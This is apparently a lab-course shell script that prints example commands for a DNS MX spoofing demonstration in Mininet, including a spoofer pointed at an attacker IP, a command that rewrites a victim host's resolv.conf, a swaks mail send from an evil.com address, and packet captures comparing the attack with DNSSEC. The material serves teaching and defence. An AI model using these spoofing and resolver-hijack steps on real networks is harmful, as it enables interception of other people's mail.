#!/bin/bash
##
## example_usage.sh - Example usage of DNS spoofing demonstration tools
##
## This script shows how to use the DNS spoofing tools manually.
##

echo "==================================================================="
echo "DNS Spoofing Demonstration - Example Usage"
echo "==================================================================="
echo ""
echo "This example shows how to use the DNS spoofing tools outside of"
echo "Mininet for testing and demonstration purposes."
echo ""

# Example 1: Start DNS spoofer
echo "--- Example 1: Start DNS Spoofer ---"
echo ""
echo "# Start the DNS spoofer on unprivileged port (no sudo needed)"
echo "python3 tools/spoof_mx.py --port 5353 --domain example.com --attacker-ip 10.0.0.66 &"
echo ""
echo "# Query the spoofer"
echo "dig @localhost -p 5353 example.com MX +short"
echo "# Expected output:"
echo "#   10 att.example.com."
echo "#   10.0.0.66"
echo ""
echo "# Stop the spoofer"
echo "pkill -f spoof_mx.py"
echo ""

# Example 2: Capture traffic
echo "--- Example 2: Capture DNS Traffic ---"
echo ""
echo "# Start packet capture"
echo "sudo ./tests/capture_and_compare.sh attack &"
echo "CAPTURE_PID=\$!"
echo ""
echo "# Wait a few seconds for capture to start"
echo "sleep 2"
echo ""
echo "# Generate some DNS traffic"
echo "dig @10.0.0.66 example.com MX"
echo "dig @10.0.0.53 example.com MX"
echo ""
echo "# Stop capture"
echo "sudo kill -SIGINT \$CAPTURE_PID"
echo ""
echo "# View results"
echo "cat /tmp/dns_spoof_evidence/attack_analysis.txt"
echo ""

# Example 3: Full demonstration in Mininet
echo "--- Example 3: Full Demonstration in Mininet ---"
echo ""
echo "# Start Mininet with lab topology"
echo "sudo python3 lab4_topo_v6e.py"
echo ""
echo "# In the Mininet CLI, run the demo:"
echo "mininet> source tests/dns_spoof_demo.cli"
echo ""
echo "# Or run individual commands:"
echo "mininet> att python3 tools/spoof_mx.py --domain example.com --attacker-ip 10.0.0.66 &"
echo "mininet> h1 bash -c 'printf \"nameserver 10.0.0.66\\n\" > /etc/resolv.conf'"
echo "mininet> h1 dig example.com MX +short"
echo "mininet> h1 swaks --to victim@example.com --from attacker@evil.com --server 10.0.0.66"
echo ""

# Example 4: Compare scenarios
echo "--- Example 4: Compare Attack vs DNSSEC ---"
echo ""
echo "# Capture baseline (legitimate DNS)"
echo "sudo ./tests/capture_and_compare.sh baseline"
echo ""
echo "# Capture attack scenario"
echo "sudo ./tests/capture_and_compare.sh attack"
echo ""
echo "# Capture with DNSSEC"
echo "sudo ./tests/capture_and_compare.sh dnssec"
echo ""
echo "# Generate comparison report"
echo "cat /tmp/dns_spoof_evidence/comparison_report.txt"
echo ""

echo "==================================================================="
echo "For more details, see:"
echo "  - tests/README.md - Demonstration documentation"
echo "  - tools/README.md - Tool documentation"
echo "  - Main README.md - Lab overview"
echo "==================================================================="
